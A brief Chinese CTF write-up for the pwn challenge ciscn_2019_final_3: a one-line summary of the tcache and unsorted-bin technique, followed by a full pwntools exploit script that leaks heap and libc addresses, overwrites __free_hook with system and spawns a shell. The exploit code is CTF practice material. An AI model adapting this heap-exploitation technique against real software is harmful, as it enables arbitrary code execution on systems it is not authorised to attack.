ciscn_2019_final_3

ciscn_2019_final_3_第1张图片
tcache机制的利用,通过unsorted泄露进而将堆空间开辟到libc中,写__free_hook拿到shell…
exp

from pwn import *

context.log_level = 'debug'

def pause_debug():
    log.info(proc.pidof(p))
    pause()

def add(idx, size, content):
    p.sendlineafter('choice >', str(1))
    p.sendlineafter('index', str(idx))
    p.sendlineafter('size', str(size))
    p.sendafter('something', content)

def remove(idx):
    p.sendlineafter('choice >', str(2))
    p.sendlineafter('index', str(idx))


proc_name = './ciscn_final_3'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 25285)
elf = ELF(proc_name)
libc = ELF('./libc-2.27.so')
add(0, 0x78, b'a') # get heap addr (chunk 0)
p.recvuntil('gift :')
chunk0 = int(p.recv(14), 16)
heap_base = chunk0 - 0x11e70
log.info(hex(heap_base))
add(1, 0x18, b'a')
add(2, 0x78, b'a')
add(3, 0x78, b'a')
add(4, 0x78, b'a')
add(5, 0x78, b'a')
add(6, 0x78, b'a')
add(7, 0x78, b'a')
add(8, 0x78, b'a')
add(9, 0x78, b'a')
add(10, 0x78, b'a')

remove(10)
remove(10)

add(11, 0x78, p64(chunk0 - 0x10))
add(12, 0x78, p64(chunk0 - 0x10))
add(13, 0x78, p64(0) + p64(0x4a1)) # fake_chunk
remove(0)
remove(1) # into unsorted bin
add(14, 0x78, b'a')
add(14, 0x78, b'a')
add(15, 0x18, b'a')

add(16, 0x18, b'a') # main_arena
# pause_debug()
p.recvuntil('gift :')
libc_base = int(p.recv(14), 16) - 0x3ebca0
log.info(hex(libc_base))

# write __free_hook
add(17, 0x68, b'a')
remove(17)
remove(17)
free_hook_addr = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
add(18, 0x68, p64(free_hook_addr))
add(19, 0x68, b'/bin/sh\x00')
add(20, 0x68, p64(system_addr))
remove(19)
p.interactive()

ciscn_2019_final_3_第2张图片

你可能感兴趣的:(pwn)